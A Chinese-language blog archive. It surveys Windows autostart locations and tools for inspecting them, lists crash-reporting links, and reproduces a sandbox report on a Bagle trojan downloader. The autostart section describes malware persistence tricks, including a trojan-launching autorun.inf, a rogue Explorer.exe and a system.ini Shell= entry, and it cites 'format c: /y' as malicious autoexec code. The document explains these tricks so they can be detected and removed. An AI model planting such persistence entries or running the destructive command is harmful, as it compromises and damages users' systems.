wininit.ini檔是很容易被許多電腦用戶忽視的系統配置檔，因為該檔在Windows啟動時自動執後會被自動刪除，這就是說該檔中的命令只會自動執行一次。該配置檔主要由軟體的安裝程式生成，對那些在Windows圖形介面啟動後就不能進行刪除、更新和重命名的檔進行操作。若其被病毒寫上危險命令，那麼後果與“C盤殺手”無異。
小提示
★如果不知道它們存放的位置，按F3鍵打開“搜索”對話方塊進行搜索；
★單擊“開始→運行”，輸入sysedit回車，打開“系統配置編輯程式”，如圖2所示，在這裏也可以方便的對上述檔進行查看與修改。
五、智能的啟動——開/關機/登錄/註銷腳本
在Windows 2000/XP中，單擊“開始→運行”，輸入gpedit.msc回車可以打開“組策略編輯器”，在左側窗格展開“本地電腦策略→ 用戶配置→管理範本→系統→登錄”，然後在右窗格中雙擊“在用戶登錄時運行這些程式”，單擊“顯示”按鈕，在“登錄時運行的專案”下就顯示了自啟動的程式。
六、定時的啟動——任務計畫
在默認情況下，“任務計畫”程式隨Windows 一起啟動並在後臺運行。如果把某個程式添加到計畫任務檔夾，並將計畫任務設置為“系統啟動時”或“登錄時”，這樣也可以實現程式自啟動。通過“計畫任務”載入的程式一般會在任務欄系統託盤區裏有它們的圖示。大家也可以雙擊“控制面板”中的“計畫任務”圖示查看其中的專案。
小提示
“任務計畫”也是一個特殊的系統檔夾，單擊“開始→程式→附件→系統工具→任務計畫”即可打開該檔夾，從而方便進行查看和管理。
七、跟著別人的啟動——隨軟體開啟的程式
隨MyIE2啟動的程式，詳見本刊2004年第3期、4期《讓你受用終生的流覽器─MyIE2實用技巧大放送》一文。
下篇全方位作戰
徹底清查Windows自啟動
一、從“系統資訊”查看啟動程式
單擊“開始→程式→附件→系統工具→系統資訊”，雙擊“軟體環境”，單擊“啟動程式”，在右邊視窗出現的程式就是所有自啟動程式，在“裝載源”或“位置”下顯出該程式是由註冊表還是“啟動”檔夾啟動的。從這裏只能查看自啟動程式，不能對自啟動程式進行禁止自啟動等任何更改操作。
軟體性質： Windows自身功能
推薦指數： ★★★★
二、MSConfig
在Windows 98/Me/XP/2003中，單擊“開始→運行”，輸入msconfig回車即可打開“系統配置實用程式”視窗，單擊“啟動”標籤，在列表框中顯示的就是從註冊表、“啟動”檔夾和系統配置檔中自啟動的程式。程式前有對號的是允許自啟動的程式，沒有對號的則不會自啟動。如果想取消某個程式的自啟動，單擊取消程式前的對勾即可。還可以在autoexec.bat、system.ini和win.ini標籤裏面對它們進行編輯，取消其中的自啟動程式。
小提示
★所有的修改都需要重新啟動才能生效。
★Windows 2000沒有msconfig程式，但是我們可以從Windows 98或者XP拷貝一個到system32目錄，同樣可以起作用。
軟體性質：免費，微軟原裝
推薦指數： ★★★★
三、startup.cpl
只需要將startup.cpl檔拷貝到Windows安裝目錄下的system32檔夾下麵即可，單擊“開始→設置→控制面板”打開控制面板，你會發現裏面多了一個Startup項，雙擊打開它，在打開的對話方塊中，可以方便地對“啟動”檔夾和註冊表中的啟動專案進行管理，如右擊空白處新建一個啟動項，右擊已有的啟動項目可以對其進行編輯、刪除、禁用和立刻運行等操作。
軟體性質：免費，綠色軟體
推薦指數： ★★★★★
四、StartupMonitor
雙擊StartupMonitor.msi執行安裝，安裝完成後，它就乖乖的在後臺運行，只佔據100多KB的記憶體，什麼時候才顯示出它的本事呢？當你安裝了一個軟體的時候，如果它想自己偷偷自啟動，嘿嘿，就必須通過StartupMonitor的這一關，如所示，它管得非常寬，無論是什麼程式，它都不放過！漁歌強烈推薦。
軟體性質：免費，小巧實用
推薦指數： ★★★★★
五、StartStop
軟體安裝後它會將自己加到註冊表的RunOnce 自啟動，啟動後會自動縮小到託盤區一個小圖示，雙擊即可打開StartStop主介面，在這裏列出了本機啟動程式，右擊某個程式可以選擇總是啟動、從不啟動還是每次詢問是否啟動，如所示，它有特色的一個地方是單擊功能表“Options→Startup delay”，可以設置啟動時延遲多少時間啟動程式。
軟體性質：免費，有特色
推薦指數： ★★★★
六、Autoruns
下載autoruns.zip後解壓縮直接執行裏面的autoruns.exe即可，由於它不會在啟動時載入，顯得更綠色。雙擊 autoruns.exe打開程式介面，它不僅僅列出的是非常全的啟動項，而且詳細地列出了啟動程式的公司和路徑，如果還不滿意，右擊某個啟動專案，選擇屬性，可以查看該啟動項的檔屬性。它還有兩個特色功能，一個是右擊任何一個啟動項，選擇Jump to就會立刻跳轉到具體的位置，如跳轉到註冊表的具體鍵值、打開啟動檔夾、打開INI檔等，非常方便！還有一個功能是單擊View功能表，可以切換是否顯示所有的啟動位置、是否顯示啟動的服務、是否只顯示非Microsoft公司的專案，這對於檢查啟動專案和過濾專案非常有用。
軟體性質：免費，綠色軟體
推薦指數： ★★★★★
七、StartUp Organizer
Startup Organizer的組織和管理自啟動項功能很強大，它在控制啟動專案方面做的也比較細，如為某個啟動設定聲音提示，還能設置在 Windows啟動時按某個鍵來控制某些程式啟動與否，還可以備份自啟動配置檔以便應急恢復、比較啟動程式的變化、恢復第一次運行時的默認配置，操作也比較簡單，遺憾之處就是不是免費的。
軟體性質：共用軟體，30天免費試用
##

Windows-自啟動方式完全總結!

一.自啟動專案:
開始---程式---啟動,裏面添加一些應用程式或者快捷方式.
這是Windows 裏面最常見,以及應用最簡單的啟動方式,如果想一些檔開機時候啟動,那麼也可以將他拖入裏面或者建立快捷方式拖入裏面.現在一般的病毒不會採取這樣的啟動手法.也有個別會.
路徑:C:\Documents and Settings\Owner\「開始」功能表\程式\啟動
二. 第二自啟動專案:
這個是很明顯卻被人們所忽略的一個,使用方法和第一自啟動目錄是完全一樣的, 只要找到該目錄，將所需要啟動的檔拖放進去就可以達到啟動的目的.
路徑:
C:\Documents and Settings\User\「開始」功能表\程式\啟動
三. 系統配置檔啟動:
對於系統配置檔,許多人一定很陌生,許多病毒都是以這種方式啟動.
1)WIN.INI啟動:
啟動位置(xxx.exe為要啟動的檔案名稱):
[windows]
load=xxx.exe[這種方法檔會在後臺運行]
run=xxx.exe[這種方法檔會在默認狀態下被運行]
2)SYSTEM.INI啟動:
啟動位置(xxx.exe為要啟動的檔案名稱)：
默認為:
[boot]
Shell=Explorer.exe [Explorer.exe是Windows程式管理器或者Windows資源管理器,屬於正常]
可啟動檔後為:
[boot]
Shell= Explorer.exe xxx.exe [現在許多病毒會採用此啟動方式,隨著Explorer啟動, 隱蔽性很好]
注意: SYSTEM.INI和WIN.INI檔不同,SYSTEM.INI的啟動只能啟動一個指定檔,不要把Shell=Explorer.exe xxx.exe換為Shell=xxx.exe,這樣會使Windows癱瘓!
3) WININIT.INI啟動:
WinInit即為Windows Setup Initialization Utility, 中文:Windows安裝初始化工具.
它會在系統裝載Windows之前讓系統執行一些命令，包括複製，刪除，重命名等，以完成更新檔的目的.
檔格式:
[rename]
xxx1=xxx2
意思是把xxx2檔複製為檔案名為xxx1的檔，相當於覆蓋xxx1文件
如果要把某檔刪除,則可以用以下命令:
[rename]
nul=xxx2
以上檔案名都必須包含完整路徑.
4) WINSTART.BAT啟動:
這是系統啟動的批次檔案,主要用來複製和刪除檔.如一些軟體卸載後會剩餘一些殘留物在系統,這時它的作用就來了.
如：
“@if exist C:\WINDOWS\TEMPxxxx.BAT call C:\WINDOWS\TEMPxxxx.BAT”
這裏是執行xxxx.BAT文件的意思
5) USERINIT.INI啟動[2/2補充]:
這種啟動方式也會被一些病毒作為啟動方式,與SYSTEM.INI相同.
6) AUTOEXEC.BAT啟動:
這個是常用的啟動方式.病毒會通過它來做一些動作. 在AUTOEXEC.BAT檔中會包含有惡意代碼。如format c: /y 等等其他.
四. 註冊表啟動:
通過註冊表來啟動,是WINDOWS中使用最頻繁的一種.
-----------------------------------------------------------------------------------------------------------------
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\
HKEY_LOCAL_MACHINE\System\ControlSet001\Session Manager\BootExecute
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\BootExecute
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\本地User\Software\Microsoft\Windows\CurrentVersion\Policies\ Explorer\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup\
HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Run\
HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\RunOnce\
HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\
HKEY_CURRENT_USER\Control Panel\Desktop
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\
HKLM\SOFTWARE\Classes\Protocols\Filter
HKLM\SOFTWARE\Classes\Protocols\Handler
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
HKLM\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved
HKLM\Software\Classes\Folder\Shellex\ColumnHandlers
HKCU\Software\Microsoft\Internet Explorer\UrlSearchHooks
HKLM\Software\Microsoft\Internet Explorer\Toolbar
HKLM\Software\Microsoft\Internet Explorer\Extensions
HKLM\System\CurrentControlSet\Control\Session Manager\BootExecute
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UIHost
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
HKCU\Control Panel\Desktop\Scrnsave.exe
HKLM\System\CurrentControlSet\Services\WinSock\Parameters\Protocol_Catalog9
HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Authentication Packages
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
五.其他啟動方式:
(1).C:\Explorer.exe啟動方式:
這種啟動方式很少人知道.
在Win9X下,由於SYSTEM.INI只指定了Windows的外殼檔Explorer.exe的名稱,而並沒有指定絕對路徑,所以Win9X會搜索Explorer.exe文件.
搜索順序如下：
(1). 搜索當前目錄.
(2). 如果沒有搜索到Explorer.exe則系統會獲取
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Executive\Path]的資訊獲得相對路徑.
(3). 如果還是沒有檔系統則會獲取[HKEY_CURRENT_USER\Environment\Path]的資訊獲得相對路徑.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Executive\Path]和[HKEY_CURRENT_USER\Environment\Path]所保存的相對路徑的鍵值為:“%SystemRoot%System32;%SystemRoot%”和空.
所以,由於當系統啟動時,“當前目錄”肯定是%SystemDrive%(系統驅動器),這樣系統搜索Explorer.EXE的順序應該是:
(1). %SystemDrive%(例如C:\)
(2). %SystemRoot%System32(例如C:\WINNT\SYSTEM32)
(3). %SystemRoot%(例如C:\WINNT)
此時,如果把一個名為Explorer.EXE的檔放到系統根目錄下,這樣在每次啟動的時候系統就會自動先啟動根目錄下的Explorer.exe而不啟動Windows目錄下的Explorer.exe了.
在WinNT系列下,WindowsNT/Windows2000更加注意了Explorer.exe的檔案名放置的位置,把系統啟動時要使用的外殼檔(Explorer.exe)的名稱放到了:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\Shell] 而在Windows 2000 SP2中微軟已經更改了這一方式.
(2).螢幕保護啟動方式:
Windows 螢幕保護程式是一個*.scr檔,是一個可執行PE檔,如果把螢幕保護程式*.scr重命名為*.exe的檔,這個程式仍然可以正常啟動,類似的*.exe文件更名為*.scr檔也仍然可以正常啟動.
檔路徑保存在System.ini中的SCRNSAVE.EXE=的這條中.如: SCANSAVE.EXE=/%system32% xxxx.scr
這種啟動方式具有一定危險.
(3).計畫任務啟動方式:
Windows 的計畫任務功能是指某個程式在某個特指時間啟動.這種啟動方式隱蔽性相當不錯.
[開始]---[程式]---[附件]---[系統工具]---[計畫任務],按照一步步順序操作即可.
(4).AutoRun.inf的啟動方式:
Autorun.inf這個檔出現於光碟載入的時候,放入光碟時,光碟機會根據這個檔內容來確定是否打開光碟裏面的內容.
Autorun.inf的內容通常是：
[AUTORUN]
OPEN=檔案名.exe
ICON=icon(圖示檔).ico
1.如一個木馬,為xxx.exe.那麼Autorun.inf則可以如下:
ōPEN=Windows\xxx.exe
ICON=xxx.exe
這時,每次雙擊C盤的時候就可以運行木馬xxx.exe.
2.如把Autorun.inf放入C盤根目錄裏,則裏面內容為:
ōPEN=D:\xxx.exe
ICON=xxx.exe
這時,雙擊C盤則可以運行D盤的xxx.exe
(5).更改副檔名啟動方式:
更改副檔名: (*.exe)
如:*.exe的檔可以改為:*.bat,*.scr等副檔名來啟動.
六.Vxd虛擬設備驅動啟動方式:
應用程式通過動態載入的VXD虛擬設備驅動,而去的Windows 9X系統的操控權(VXD虛擬設備驅動只適用於Windows 95/98/Me).
可以用來管理例如硬體設備或者已安裝軟體等系統資源的32位元可執行程式，使得幾個應用程式可以同時使用這些資源.
七.Service[服務]啟動方式:
[開始]---[運行]---輸入"services.msc",不帶引號---即可對服務專案的操作.
在“服務啟動方式”選項下,可以設置系統的啟動方式:程式開始時自動運行,還是手動運行,或者永久停止啟動,或者暫停(重新啟動後依舊會啟動).
註冊表位置:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services
通過服務來啟動的程式,都是在後臺運行,例如國產木馬"灰鴿子"就是利用此啟動方式來達到後臺啟動,竊取用戶資訊.
八.驅動程式啟動方式:
有些病毒會偽裝成硬體的驅動程式,從而達到啟動的目的.
1.系統自帶的驅動程式.[指直接使用作業系統自帶的標準程式來啟動]
2.硬體自帶的驅動程式.[指使用硬體自帶的標準程式來啟動]
3.病毒本身偽裝的驅動程式.[指病毒本身偽裝的標準程式來啟動]
06/3/11補充[來自peter_yu]:
windir\Start Menu\Programs\Startup\
User\Startup\
All Users\Startup\
windir\system\iosubsys\
windir\system\vmm32\
windir\Tasks\
c:\explorer.exe
c:\autoexec.bat
c:\config.sys
windir\wininit.ini
windir\winstart.bat
windir\win.ini - [windows] "load"
windir\win.ini - [windows] "run"
windir\system.ini - [boot] "shell"
windir\system.ini - [boot] "scrnsave.exe"
windir\dosstart.bat
windir\system\autoexec.nt
windir\system\config.nt
06/3/25補充[來自smzd2005]:
Folder.htt
desktop.ini
C:\Documents and Settings\用戶名\Application Data\Microsoft\Internet Explorer\Desktop.htt
06/8/1補充[補充(註冊表啟動方式)]:
HKLM\SYSTEM\CurrentControlSet\Control\MPRServices
HKCU\ftp\shell\open\command
HKCR\ftp\shell\open\command
HKCU\Software\Microsoft\ole
HKCU\Software\Microsoft\Command Processor
HKLM\SOFTWARE\Classes\mailto\shell\open\command
HKLM\SOFTWARE\Classes\PROTOCOLS
HKCR\PROTOCOLS
HKCU\Control Panel\Desktop
HKLM\SOFTWARE\Policies\Microsoft\Windows\System\scrīpts
HKLM\SOFTWARE\Microsoft\Code Store Database\Distribution Units
HKLM\SYSTEM\CurrentControlSet\Services\WinSock2
HKLM\SYSTEM\CurrentControlSet\Control\Lsa
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Management\ARPCache
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Shell folders\Startup
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\runServices
HKLM\Software\Microsoft\Active Setup\Installed Components
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows
06/8/6補充[補充(註冊表啟動方式)]:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
HKLM\SOFTWARE\Classes\Protocols\Handler
HKLM\System\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\StartupPrograms
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

minidump

2009-04-25T22:11:00.001-07:00

Trapping Bugs with BlackBox

Updated:26 May 2003

http://www.codeproject.com/KB/applications/blackbox.aspx

XCrashReport : Exception Handling and Crash Reporting - Part 1

Posted:20 Oct 2003

http://www.codeproject.com/KB/debug/XCrashReportPt1.aspx

XCrashReport : Exception Handling and Crash Reporting - Part 2

Posted:20 Oct 2003

http://www.codeproject.com/KB/debug/XCrashReportPt2.aspx

XCrashReport : Exception Handling and Crash Reporting - Part 3

Posted:20 Oct 2003

http://www.codeproject.com/KB/debug/XCrashReportPt3.aspx

Microsoft Debugging Tools

Own Crash Minidump with Call Stack

Updated:18 Nov 2004

http://www.codeproject.com/KB/applications/minidump.aspx

Catch All Bugs with BugTrap!

Updated:31 Jan 2009

http://www.codeproject.com/KB/applications/BugTrap.aspx

BugTrap downloads

You may download BugTrap documentation, setup and source code absolutely for free!

http://www.intellesoft.net/downloads.php

ThreatExpert：

2009-04-18T21:59:00.001-07:00

http://blog.threatexpert.com/

ThreatExpert：是一個用來分析可疑檔案的網站... ... 線上檢查版：http://www.threatexpert.com/submit.aspx 可以把可疑的檔案上傳，幾分鐘就會有報告

hldrrr.exe srosa.sys bagle

2009-04-18T19:54:00.001-07:00

Submission Summary:

Submission details:
- Submission received: 19 April 2009, 12:09:13
- Processing time: 9 min 24 sec
- Submitted sample:
  - File MD5: 0x113554AB42E9EF2B530284E51370C507
  - File SHA-1: 0x661783D44061A4AD2077F6C47DBFDDA5AF57A1FE
  - Filesize: 655,360 bytes
  - Alias:
    - Trojan.DL.Bagle.ZPL [PCTools]
    - W32.Beagle.EB [Symantec]
    - Trojan-Downloader.Win32.Bagle.ajd [Kaspersky Lab]
    - Downloader.gen.a [McAfee]
    - Troj/Agent-GQY [Sophos]
    - TrojanDownloader:Win32/Bagle.RN [Microsoft]
    - Trojan-Downloader.Win32.Bagle [Ikarus]
    - Win-Trojan/Bagle.655360 [AhnLab]

Summary of the findings:

What's been found
Severity Level

Capability to terminate Antivirus, Firewall and other security related processes.

Is protected with Themida in order to prevent the sample from being reverse-engineered. Themida protection can potentially be used by a threat to complicate the manual threat analysis (e.g. the sample would not run under the Virtual Machine).

Downloads/requests other files from Internet.

Compromises SafeBoot registry key(s) in an attempt to disable the Safe Mode.

Creates a startup registry entry.

Contains characteristics of an identified security risk.

Possible Security Risk

Attention! Characteristics of the following security risks were identified in the system:

Security Risk
Description

Trojan-Downloader.Bagle
Trojan.Downloader.Bagle runs in the background and attempts to download malicious files from the Internet without the users knowledge.

Trojan.Lodear.D
Trojan.Lodear.D is a trojan that will install itself onto infected computers so it will start everytime the system reboots. It will also try to download and install additional malware from a list of predetermined websites.

Rootkit.Agent
Rootkit.Agent is a trojan that hijack browser in order to produce popup advertisements from known badsites and also have rootkit functionality in order to hide itself as system driver.

Attention! The following threat categories were identified:

Threat Category
Description

A malicious trojan horse or bot that may represent security risk for the compromised system and/or its network environment

A program that downloads files to the local computer that may represent security risk

A network-aware worm that attempts to replicate across the existing network(s)

File System Modifications

The following files were created in the system:

#
Filename(s)
File Size
File Hash
Alias

1
%System%\drivers\hldrrr.exe
[file and pathname of the sample #1]
655,360 bytes
MD5: 0x113554AB42E9EF2B530284E51370C507
SHA-1: 0x661783D44061A4AD2077F6C47DBFDDA5AF57A1FE
Trojan.DL.Bagle.ZPL [PCTools]
W32.Beagle.EB [Symantec]
Trojan-Downloader.Win32.Bagle.ajd [Kaspersky Lab]
Downloader.gen.a [McAfee]
Troj/Agent-GQY [Sophos]
TrojanDownloader:Win32/Bagle.RN [Microsoft]
Trojan-Downloader.Win32.Bagle [Ikarus]
Win-Trojan/Bagle.655360 [AhnLab]

2
%System%\drivers\srosa.sys
100,352 bytes
MD5: 0x09348BABE24297C2911724AD90FC773B
SHA-1: 0x004F941EB05890E960337074F79B83E6A7577C08
Rootkit.Bagle.Gen.21 [PCTools]
Trojan Horse [Symantec]
Trojan-Downloader.Win32.Bagle.jh [Kaspersky Lab]
Generic Downloader.x [McAfee]
Trojan:WinNT/Bagle.gen!B [Microsoft]
Trojan-Downloader.Win32.Bagle [Ikarus]
Win-Trojan/Bagle.100352 [AhnLab]

Note:
- %System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).

The following directory was created:
- %System%\drivers\down

The following directory was deleted:
- [pathname with a string SHARE]\shared

The following system services were modified:

Service Name
Display Name
New Status
Service Filename

ALG
Application Layer Gateway Service
"Stopped"
%System%\alg.exe

SharedAccess
Windows Firewall/Internet Connection Sharing (ICS)
"Stopped"
%System%\svchost.exe -k netsvcs

wscsvc
Security Center
"Stopped"
%System%\svchost.exe -k netsvcs

wuauserv
Automatic Updates
"Stopped"
%System%\svchost.exe -k netsvcs

There was a new kernel-mode driver installed in the system:

Driver Name
Driver Filename

Megadrv3
%System%\drivers\srosa.sys

Registry Modifications

The following Registry Keys were created:
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Security Center
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Security Center\Svc
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SROSA
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SROSA\0000
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SROSA\0000\Control
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\srosa
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\srosa\Security
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\srosa\Enum
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SROSA
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SROSA\0000
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SROSA\0000\Control
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srosa
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srosa\Security
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srosa\Enum
- HKEY_CURRENT_USER\Software\FirstRRRun
- HKEY_CURRENT_USER\Software\Local AppWizard-Generated Applications
- HKEY_CURRENT_USER\Software\Local AppWizard-Generated Applications\uiytuhjy
- HKEY_CURRENT_USER\Software\Local AppWizard-Generated Applications\uiytuhjy\Settings

The following Registry Keys were deleted:
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\AppMgmt
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Base
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Boot Bus Extender
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Boot file system
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CryptSvc
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\DcomLaunch
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\dmadmin
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\dmboot.sys
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\dmio.sys
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\dmload.sys
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\dmserver
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\EventLog
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\File system
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Filter
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\HelpSvc
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Netlogon
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\PCI Configuration
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\PlugPlay
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\PNP Filter
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Primary disk
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\RpcSs
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SCSI Class
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\sermouse.sys
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\sr.sys
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SRService
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\System Bus Extender
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\vga.sys
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\vgasave.sys
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinMgmt
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{36FC9E60-C465-11CF-8056-444553540000}
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E965-E325-11CE-BFC1-08002BE10318}
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E969-E325-11CE-BFC1-08002BE10318}
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E96A-E325-11CE-BFC1-08002BE10318}
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E96B-E325-11CE-BFC1-08002BE10318}
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E96F-E325-11CE-BFC1-08002BE10318}
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E977-E325-11CE-BFC1-08002BE10318}
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E97B-E325-11CE-BFC1-08002BE10318}
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E97D-E325-11CE-BFC1-08002BE10318}
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E980-E325-11CE-BFC1-08002BE10318}
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{71A27CDD-812A-11D0-BEC7-08002BE2092F}
